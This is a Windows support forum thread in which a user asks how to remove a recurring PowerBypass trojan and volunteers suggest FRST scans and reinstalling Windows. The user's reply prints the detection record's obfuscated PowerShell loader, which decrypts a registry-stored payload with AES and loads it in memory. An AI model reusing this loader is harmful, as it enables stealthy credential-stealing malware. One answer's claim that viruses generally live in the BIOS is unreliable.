It's an infostealer so, passwords, logins, whatever a keylogger could acquire, etc. Hopefully Malwarebytes got all of it.
How do I really get rid of Trojan:Win32/PowerBypass.DA!MTB? It keeps coming back.
![](data:image/svg+xml, %3Csvg xmlns='http://www.w3.org/2000/svg' height='64' class='font-weight-bold' style='font: 600 30.11764705882353px "SegoeUI", Arial' width='64'%3E%3Ccircle fill='hsl(128, 8%, 22%)' cx='32' cy='32' r='32' /%3E%3Ctext x='50%25' y='55%25' dominant-baseline='middle' text-anchor='middle' fill='%23FFF' %3EA%3C/text%3E%3C/svg%3E)
Anonymous
For the past eight days at least, at the start of each day, Windows Defender has supposedly removed Trojan:Win32/PowerBypass.DA!MTB from my system. But it keeps doing this, implying that this trojan isn't really gone. How do I get rid of this for good?
Windows for home | Windows 11 | Security and privacy
Locked Question. This question was migrated from the Microsoft Support Community. You can vote on whether it's helpful, but you can't add comments or replies or follow the question.
7 answers
Sort by: Most helpful
-
Anonymous
2025-04-21T12:03:29+00:00 Microsoft Community seems to not be happy with sharing images, so here's the text of the detection record:
Detected: Trojan:Win32/PowerBypass.DA!MTB
Status: Removed
A threat or app was removed from this device.
Details: This program is dangerous and executes commands from an attacker.
Affected Items:
CmdLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $A=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$A.Key=@([byte]0,196,140,72,21,72,64,89,154,182,168,161,70,202,2,191,102,42,211,52,91,254,29,124,110,58,126,180,105,191,32,157);$A.IV=@([byte]221,102,202,39,207,201,16,220,13,229,251,157,63,5,0,156);$F=(get-itemproperty 'HKCU:\Software\Classes\tlrdnl1kcfk').'(default)';[Reflection.Assembly]::Load($A.CreateDecryptor().TransformFinalBlock($F,0,$F.Length));[YQirTLzRAk9kIDH0AJifVmigFQv6zlpQ0jjCUuZX3E_r7r3wVU0WaoRgJBihbM_QVx.eWKDxqqzm0nAi4tb96jtpVPxGyiTX2PtAAktSAUuWDuFLYixKB5]::g6T4pyZII3rtNNXoN1GeIWPOljI4CT3('7Y0RETCT70KK5C6VWK21K3YG9FN3T8BI');
The FRST logs contain a lot of personal information about my computer, so I'm not sure I'm comfortable uploading that online. Is there anything in the log I should be looking for as a sign of where the trojan is and/or how to fix it?
-
quietman7 MVP Alumni 19,735 Reputation points Volunteer Moderator2025-04-20T00:35:59+00:00 I could not even find a listing of Trojan:Win32/PowerBypass.DA!MTB on Microsoft's Change logs for security intelligence threat detections.
I suggest you follow AW's instructions for using FRST. -
_AW_ 67,756 Reputation points Volunteer Moderator2025-04-20T00:11:45+00:00 Please post a screenshot of the detection record and where it is being detected.
Also scan with Farbar Recovery Scan Tool (FRST) so that startup locations and services can be checked for malware.
https://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/
Note: If you are using Edge or Chrome, SmartScreen may initially block the download.
Click on the three dots next to the warning and select Keep => Show more => Keep anyway.
- If your computer's language is not English, rename FRST64.exe to FRST64English.exe
- Run the tool, leave the default settings, and press Scan.
- Zip the logs, FRST.txt and Addition.txt, then upload to a cloud storage service like OneDrive, Google Drive or gofile.io
- Post the share link.
-
Anonymous
2025-04-19T21:23:15+00:00 Since viruses are not hosted in a single part of the system but in general of the BIOS, it is best to make a new installation of your operating system from a USB so that the virus is completely eliminated, I recommend an antivirus and not download anything from unreliable pages to avoid losing your data.
Remember that most viruses are inserted into files and even if we do the windows installation without losing your files, sometimes the virus persists.
I recommend a clean and complete installation of your OS so that nothing remains of the virus.